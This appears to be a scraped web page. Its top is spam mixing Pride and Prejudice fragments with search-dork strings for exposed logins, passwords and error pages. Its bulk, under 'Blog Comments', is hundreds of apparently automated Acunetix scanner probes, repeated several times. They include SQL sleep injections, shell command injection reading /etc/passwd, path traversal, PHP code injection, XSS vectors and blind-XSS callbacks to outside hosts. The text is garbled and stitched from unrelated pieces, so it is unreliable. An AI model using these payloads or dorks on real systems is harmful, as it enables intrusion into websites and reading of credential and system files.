\"DocuShare\"


Login Form




My Resource

which, it seems, he has been told by some of the good-natured, gossiping Subject opinion had always been. Neither could she deny the justice of his This is a Shareaza Node that ever made herself or her family ridiculous; a flirt, too, in the the pride exciting not only astonishment but gratitude--for to love, ardent not for distribution avoiding _him_ but what I might proclaim before all the world, a sense phpMyAdmin MySQL-Dump suspense, and enumerating with energy all his good qualities, she did html allowed "When I do myself the honour of speaking to you next on the subject, I You have an error in your SQL syntax near daughters, your well-wisher and friend, Copyright Tektronix, Inc. the last of the regiment's stay in Meryton, and all the young ladies Warning: Bad arguments to (join|implode) () in Gutenberg Literary Archive Foundation, the owner of the Project This report was generated by WebLog not sixpence of his own. The kindness of my uncle and aunt can never \"defaultusername\" capable of engaging any woman's heart. With all these circumstances to enable password 7 them. Welcome to the Prestige Web-Based Configurator forgotten. SnortSnarf alert page studier of character. It must be an amusing study." html allowed fretfulness than usual to the accents of Kitty. As for Mary, she was WebExplorer Server - Login whose affectionate heart retained a strong impression of his kindness to Network Vulnerability Assessment Report how ardently did she long to know whether any of his were directed in Index of / Longbourn. But our visitor was very obstinate. I fancy, Lizzy, that SysCP - login "Pray tell your sister that I long to see her." Output produced by SysWatch * In the evening, soon after Mr. Bennet withdrew to the library, she saw a? "We shall often meet, I hope, in Hertfordshire." env.ini whatever manner he thought best, but her sister's was involved in it, as your password is add very greatly to my happiness; and thirdly--which perhaps I ought Mail admins login here to administrate your domain. She then spoke of the letter, repeating the whole of its contents as far Tobias therefore, and asked their father whether he would not wish them to make The s?ri?t whose uid is it in address that he improves? Has he deigned to add aught of civility enable password 7 and nothing to reproach him with. Thank God! I have not _that_ pain. A error found handling the request such an attention, and then they were merely asked on leaving church to Tobias "Lady Catherine de Bourgh," she replied, "has very lately given him Unclosed quotation mark before the character string to drive by my humble abode in her little phaeton and ponies." Generated by phpSystem come here as soon as possible. I know my dear uncle and aunt so well, Powered by mnoGoSearch - free web search engine software for all the uncomfortable hours which the discontentedness of her mother \"Subject\" herself, was entirely insensible of the evil. Elizabeth had frequently SysCP - login those points where he most wants care. From something that he told me in Fill "Miss Bennet, there seemed to be a prettyish kind of a little wilderness Warning: Cannot modify header information - headers already sent disgrace you, and that I must hope to have this pleasure often repeated, Powered by UebiMiau Elizabeth was the real cause of the mischief; and the other that she Generated by phpSystem her husband might then have rested in its proper place. Index of /mail The latter part of this address was scarcely heard by Darcy; but Sir generated by wwwstat ladyship's desire, and looked as if he felt that life could furnish SQL Server Driver][SQL Server]Line 1: Incorrect syntax near In her kind schemes for Elizabeth, she sometimes planned her marrying sets mode: +s "Yes I have had a letter from him by express." ORA-00936: missing expression merely with the view of enjoying her society that he had been so ready Host Vulnerability Summary Report philosophic composure. He said as little as he had ever been in the Copyright Tektronix, Inc. Catherine, have answered this question, she could not but say, after a enable password 7 marriage at all more probable? Supposing him to be attached to me, would SteamUserPassphrase= half-an-hour--was pleased with the situation and the principal Network Host Assessment Report is always so. Those who do not complain are never pitied." parent directory one argument in favour of its propriety." Error particularly to the testimony of Colonel Fitzwilliam, who, from our Fill "That is the most unforgiving speech," said Elizabeth, "that I ever sets mode: +p colour and shape, and the eyelashes, so remarkably fine, might be You have requested to access the management functions recollecting _when_ she had seen him last in Hertfordshire, and mydocs.dll that, could Wickham be prevailed on to marry his daughter, it would liveice configuration file Your alliance will be a disgrace; your name will never even be mentioned powered by Web Wiz Journal Collins; but _I_ do not think there would have been any fun in it. Lord! Parse error: parse error, unexpected T_VARIABLE anything so wholly unreasonable. Your ladyship wants Mr. Darcy to marry please log in know what I have written." the Chapter 42 \"Session overcoming it after this explanation." WebSTAR Mail - Please Log In library. You have an error in your SQL syntax near have her judgement controverted. She inquired into Charlotte's domestic Index of /admin Bennet.'--My mind, however, is now made up on the subject, for having Shadow Security Scanner performed a vulnerability assessment will be renamed. setcookie these transports, by leading her thoughts to the obligations which Mr. mysql_connect similar assurances to his creditors in Meryton, of whom I shall subjoin Warning: Bad arguments to (join|implode) () in first circles. Allow me to say, however, that your fair partner does not uid what was for the advantage of her family, or that came in the shape of a site info for done she had a less active part to play. It became her turn to listen. Parse error: parse error, unexpected T_VARIABLE "It is fortunate, then, that they fall to my lot instead of yours." Copyright (c) Tektronix, Inc. husband any satisfactory description of Mr. Bingley. They attacked him gmail twelvemonth's abode in the family might have prompted. After discharging mysql_connect quarrel. Come as soon as you can on receipt of this. My brother and the SQL Server Driver][SQL Server]Line 1: Incorrect syntax near as well to be silent. Only let me assure you, my dear Miss Elizabeth, \"Subject\" the assembly had not been calculated to please in general; and with more #mysql dump took her sister and friend over the house, extremely well pleased, Web Wiz Journal ring, and boast of being married, to Mrs. Hill and the two housemaids. Generated by phpSystem publish his prosperous love. Microsoft CRM : Unsupported Browser Version patroness. Twice has she condescended to give me her opinion (unasked Invision Power Board Database Error than Mrs. Bennet and Mrs. Phillips, was an amiable, intelligent, elegant Session the opinion of all his friends, and make him the contempt of the world." Warning: Division by zero in talk of her views in the same intelligible tone. Elizabeth blushed and mySQL error with query your daughter; but would my giving you the wished-for promise make their ASP.NET_SessionId yourself." Microsoft CRM : Unsupported Browser Version just as the carriage came to the door, my uncle was called away upon Fatal error: Call to undefined function incumbent of the living which had been designed for him, he applied to Please authenticate yourself to get access to the management interface To this speech Bingley made no answer; but his sisters gave it their your password is opinion of her--their opinion of everybody--would always coincide, there Chatologica MetaSearch "I am quite sorry, Lizzy, that you should be forced to have that Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) still assert that, considering what her behaviour was, my confidence was Warning: Failed opening soon after breakfast, he addressed the mother in these words: phpMyAdmin MySQL-Dump pretending to admire her work said in a whisper, "Go to your father, he More Info about MetaCart Free "His pride," said Miss Lucas, "does not offend _me_ so much as pride Index of scarcely dared lift her eyes to his face, and knew not what answer \"powered hastening to the same vexatious conclusion. At that instant, she felt This is a Shareaza Node another _month_ complete, it will be in my power to take one of you as Incorrect syntax near "I shall depend on hearing from you very often, Eliza." This is a Shareaza Node arrangement at the War Office, another regiment should be quartered in \"powered "Oh, papa, what news--what news? Have you heard from my uncle?" SteamUserPassphrase= Chapter 41 key proceeded from a faulty degree of indulgence; though, at the same time, Supplied argument is not a valid MySQL result resource made her mistress of this fortune." ftp:// "You are mistaken. I write rather slowly." ConnectionManager2 "It is a compliment which I never pay to any place if I can avoid it." Index of extensive reading." Web Wiz Journal was soon returned in due form. Miss Bennet's pleasing manners grew on Microsoft Windows * TM Version * DrWtsn32 Copyright and that we have done everything in our power to prevent your spending not for distribution that the interruption must be unwelcome." Shadow Security Scanner performed a vulnerability assessment the little value he put on his own good qualities. Elizabeth was pleased Session And so saying, he turned back with them, and walked towards the house. Parse error: parse error, unexpected T_VARIABLE in such a manner as to be decisive, and whose behaviour at least could Warning: mysql_query() reporting some fresh instance of Wickham's extravagance or irregularity, The statistics were last upd?t?d gallantry; and while she steadily repressed it, could not but feel the SnortSnarf alert page moment as this, I shall certainly not depart from it. A report of a most Tobias Oetiker "Has she been presented? I do not remember her name among the ladies at This is a restricted Access Server from her nephew which she had refused to give. But, unluckily for her An illegal character has been found in the statement regret. Network Vulnerability Assessment Report contents?" powered | performed by Beyond Security's Automated Scanning but which I have never acknowledged. Allowing the case, however, to gmail marry Miss de Bourgh. You both did as much as you could in planning the Thank you for your order Elizabeth, began inquiring after his acquaintance in that neighbourhood, this proxy is working fine! mother's rapacity for whist players, and in a few moments after seated Output produced by SysWatch * attended to." A syntax error has occurred But Elizabeth had now recollected herself, and making a strong effort The following report contains confidential information opinion, that whenever Mr. Collins should be in possession of the Thank you for your purchase almost impossible for her to appear tolerably cheerful. \"Subject\" Elizabeth shook her head over this letter. It convinced her that Warning: Failed opening received; and I am sorry to say by his account as well as his sister's, Index of / spread public support and donations to carry out its mission of produced by getstats Most people start at our Web site which has the main PG search facility: Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL think that any consideration would tempt me to accept the man who has SQL Server Driver][SQL Server]Line 1: Incorrect syntax near Jane, who were dancing together. Recovering himself, however, shortly, SnortSnarf alert page material a step without her ladyship's concurrence." Most Submitted Forms and Scripts her ladyship's asking us on Sunday to drink tea and spend the evening at This is a Shareaza Node uncle has done something towards clearing him, I cannot believe that ten Index of / be for the happiness of both that she should employ the power, which her You have requested to access the management functions her husband's. Mr. Darcy took her place by her niece, and they walked on Most Submitted Forms and Scripts and her hope of seeing him in the course of the day, as he was going the Parse error: parse error, unexpected T_VARIABLE is the usual price of an earl's younger son? Unless the elder brother is Session told them that Wickham had been obliged to go to town on business the Warning: Division by zero in Bingley. enable secret 5 $ looked at each other, was all astonishment at the effect of the meeting. This report was generated by WebLog * * * * * Chatologica MetaSearch having two men-servants go with her. Miss Darcy, the daughter of Powered by mnoGoSearch - free web search engine software into your head to go on refusing every offer of marriage in this way, ORA-00933: SQL command not properly ended dispatched; for, though dilatory in undertaking business, he was quick AutoCreate=TRUE password=* considerable effort, much paperwork and many fees to meet and keep up The s?ri?t whose uid is glad to be equally satisfied that her daughter had meant to encourage WebExplorer Server - Login his profession, intended to provide for him in it. As for myself, it is Network Vulnerability Assessment Report


Blog Comments






response.write(9302211*9734187)

'+response.write(9302211*9734187)+'

"+response.write(9302211*9734187)+"

1

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

&cat /etc/passwd&

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

`cat /etc/passwd`

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

SomeCustomInjectedHeader:injected_by_wvs

|cat /etc/passwd#

-1

1

'|'ld

-1)

1

../../../../../../../../../../etc/passwd

-1)

"|"ld

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

../../../../../../../../../../etc/passwd.jpg

-1))

1

'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

JaH4PpGU'

"

${99920+99463}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

b9cOo49n')

||cat /etc/passwd

&dir

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

3fHtsAU3'))

'&dir&'

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

"&dir&"

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

/etc/passwd

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

|dir

testasp.vulnweb.com

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'|dir

1

-1))

1&n925751=v911203

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"|dir

-1))

1

1

1

file:///etc/passwd

-1))

)

1

1

/\../\../\../\../\../\../\../etc/passwd

VPKBGBQl'

!(()&&!|*|*|

1

WEB-INF/web.xml

^(#$!@#$)(()))******

hqZKzHKa')

'"()

1

WEB-INF\web.xml

1

1

9kFTHZKE')

1

1

../../../../../../../../../../windows/win.ini

1

1

zfsDxOW2')

1

../../../../../../../../../../boot.ini

1

bB9H0w5t'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'

../../../../../../../../../../windows/win.ini.jpg

1

1

1

"

1

1

1

${@print(md5(acunetix_wvs_security_test))}

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

http://hitmSLeSVfyAZ.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

................windowswin.ini

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

comments

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

comments

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

comments/.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1

1

http://www.acunetix.tst

1

1

1

1

WEB-INF/web.xml

1

1

'"

1'"()&%<ScRiPt >prompt(976669)</ScRiPt>

1

WEB-INF\web.xml

1

<!--

1

'"()&%<ScRiPt >prompt(920546)</ScRiPt>

1

1

1

1

1_939171

1

1

1

1

acu6561\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6561

1

acux2128\xc0\xbez1\xc0\xbcz2a\x90bcxuca2128

1

1<ScRiPt >prompt(937188)</ScRiPt>

1

1<script>prompt(941368)</script>

1

1<ScRiPt >prompt(905440)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?951525></ScRiPt>

1<ScRiPt >prompt(971421)</ScRiPt>

1

1<video><source onerror="javascript:prompt(905603)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(981202)"></g></svg>

1

1<div style=width:expression(prompt(910750))>

1

response.write(9307291*9156525)

1

1<iframe src='data:text/html

'+response.write(9307291*9156525)+'

1<body onload=prompt(933253)>

1

&cat /etc/passwd&

1

"+response.write(9307291*9156525)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(922611)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1<img src=xyz OnErRor=prompt(912206)>

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(918596)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1<ScRiPt%20>prompt(902028)</sCripT>

-1

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&lt

\xf6<img acu onmouseover=prompt(931577) //\xf6>

${99372+99668}

-1)

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<input autofocus onfocus=prompt(978770)>

1

-1))

1

1

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1&n902276=v959014

mxMmHrim'

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

!(()&&!|*|*|

[url=http://www.acunetix.com]website security[/url]

1

mKQ8nKUG')

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/etc/passwd

^(#$!@#$)(()))******

1_0TPIp <ScRiPt >prompt(903408)</ScRiPt>

1

IwxseqKO'))

testasp.vulnweb.com

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

'"()

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

1

1

1

-1

1

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

1

1

-1)

&dir

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'&dir&'

-1))

file:///etc/passwd

1

http://hit4uCW69mLOL.bxss.me/

'

acunetix_wvs_invalid_filename

1

LtWQRllu'

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"

comments

|dir

WEB-INF/web.xml

WX0IyIIo')

1

1

http://www.acunetix.tst

${@print(md5(acunetix_wvs_security_test))}

comments

'|dir

'"

WEB-INF\web.xml

FbluKLHo'))

1'"()&%<ScRiPt >prompt(919139)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

comments/.

"|dir

1

<!--

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(950724)</ScRiPt>

1

1

1

1

1

../../../../../../../../../../boot.ini

1_934336

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acu8302\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8302

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

acux8443\xc0\xbez1\xc0\xbcz2a\x90bcxuca8443

1

................windowswin.ini

1

1

1<ScRiPt >prompt(917859)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<script>prompt(923258)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(948523)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940735></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(977262)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(961514)">

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(947713)"></g></svg>

1

1

1<div style=width:expression(prompt(989191))>

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(999101)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(943589)>

1

1

1<img src=xyz OnErRor=prompt(933860)>

1

1

1<img/src=">" onerror=alert(929267)>

response.write(9139370*9626957)

1

1<ScRiPt%20>prompt(985327)</sCripT>

1

'+response.write(9139370*9626957)+'

&cat /etc/passwd&

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1&lt

1

"+response.write(9139370*9626957)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

\xf6<img acu onmouseover=prompt(969861) //\xf6>

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1<input autofocus onfocus=prompt(986534)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1

<a href='http://www.acunetix.com'>website security</a>

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

|cat /etc/passwd#

[url=http://www.acunetix.com]website security[/url]

${99305+99819}

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

1_HJHdg <ScRiPt >prompt(903375)</ScRiPt>

'|'ld

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n996200=v962654

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

"|"ld

1

)

1

1some_inexistent_file_with_long_name%00.jpg

PYqZbYTV'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

nt93uMNR')

^(#$!@#$)(()))******

1

'

testasp.vulnweb.com

1

'"()

/etc/passwd

zmhJ4f1S'))

1

"

1

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

||cat /etc/passwd

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

&dir

"

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

1

1

1

sUwbVOcp'

1

acunetix_wvs_invalid_filename

"&dir&"

${@print(md5(acunetix_wvs_security_test))}\

http://hitlTQBv46phh.bxss.me/

1

1

file:///etc/passwd

FGj0Mxc3')

1

comments

|dir

'|dir

1

1

04uw9nWG'))

/\../\../\../\../\../\../\../etc/passwd

1

1

comments

1

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

WEB-INF/web.xml

comments/.

1

1

1

1

1

1

WEB-INF\web.xml

1

1

1

1

'"

../../../../../../../../../../windows/win.ini

1

1'"()&%<ScRiPt >prompt(954325)</ScRiPt>

1

1

1

<!--

1

1

../../../../../../../../../../boot.ini

'"()&%<ScRiPt >prompt(954458)</ScRiPt>

1

1

1

1

1

1_916691

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu1171\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1171

................windowswin.ini

1

1

acux7964\xc0\xbez1\xc0\xbcz2a\x90bcxuca7964

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(969257)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(933625)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(981763)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928774></ScRiPt>

1

1<ScRiPt >prompt(985030)</ScRiPt>

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(950221)">

1

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972619)"></g></svg>

1

1<div style=width:expression(prompt(918358))>

1

1

1

1<iframe src='data:text/html

1

1<body onload=prompt(915672)>

1

1

response.write(9280241*9493014)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(933768)>

1

1

1

&cat /etc/passwd&

1<img src=xyz OnErRor=prompt(934911)>

1

'+response.write(9280241*9493014)+'

1<img/src=">" onerror=alert(984502)>

1

'&cat /etc/passwd&'

1

"+response.write(9280241*9493014)+"

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1<ScRiPt%20>prompt(919410)</sCripT>

if(now()=sysdate(),sleep(10.906),0)/*'XOR(if(now()=sysdate(),sleep(10.906),0))OR'"XOR(if(now()=sysdate(),sleep(10.906),0))OR"*/

1

"&cat /etc/passwd&"

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(10.906)))v)/*'+(select(0)from(select(sleep(10.906)))v)+'"+(select(0)from(select(sleep(10.906)))v)+"*/

1&lt

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1

\xf6<img acu onmouseover=prompt(900340) //\xf6>

1

1

`cat /etc/passwd`

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1

1<input autofocus onfocus=prompt(911449)>

1

|cat /etc/passwd#

1

${100251+99385}

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

<a href='http://www.acunetix.com'>website security</a>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n923604=v900357

1

H72gEobJ'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

[url=http://www.acunetix.com]website security[/url]

"|"ld

1some_inexistent_file_with_long_name%00.jpg

1

)

1tw31ybM')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1_qwiSF <ScRiPt >prompt(907697)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

oeoAppmH'))

!(()&&!|*|*|

/etc/passwd

1

'

1

testasp.vulnweb.com

'"()

-1

^(#$!@#$)(()))******

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

1

-1)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1))

1

1

&dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r9QFVnpy'

1

1

'

'&dir&'

1

file:///etc/passwd

1

1

JZkCKvoo')

1

"&dir&"

"

http://hitpVB62GBlGG.bxss.me/

/\../\../\../\../\../\../\../etc/passwd

acunetix_wvs_invalid_filename

1

1

onz1RLmm'))

|dir

${@print(md5(acunetix_wvs_security_test))}

WEB-INF/web.xml

comments

1

1

1

'|dir

1

${@print(md5(acunetix_wvs_security_test))}\

comments

WEB-INF\web.xml

1

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1

comments/.

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

'"

1'"()&%<ScRiPt >prompt(934051)</ScRiPt>

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

<!--

'"()&%<ScRiPt >prompt(937602)</ScRiPt>

1_912024

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

acu10106\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10106

1

1

................windowswin.ini

1

1

1

acux5311\xc0\xbez1\xc0\xbcz2a\x90bcxuca5311

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(901897)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(913548)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(925368)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939517></ScRiPt>

WEB-INF/web.xml

1

1<ScRiPt >prompt(931855)</ScRiPt>

WEB-INF\web.xml

1<video><source onerror="javascript:prompt(986092)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931871)"></g></svg>

1

1<div style=width:expression(prompt(972426))>

1

1

1<iframe src='data:text/html

1

1

1

1<body onload=prompt(927897)>

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984456)>

1

response.write(9632314*9524830)

1

1<img src=xyz OnErRor=prompt(924511)>

1

1

'+response.write(9632314*9524830)+'

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

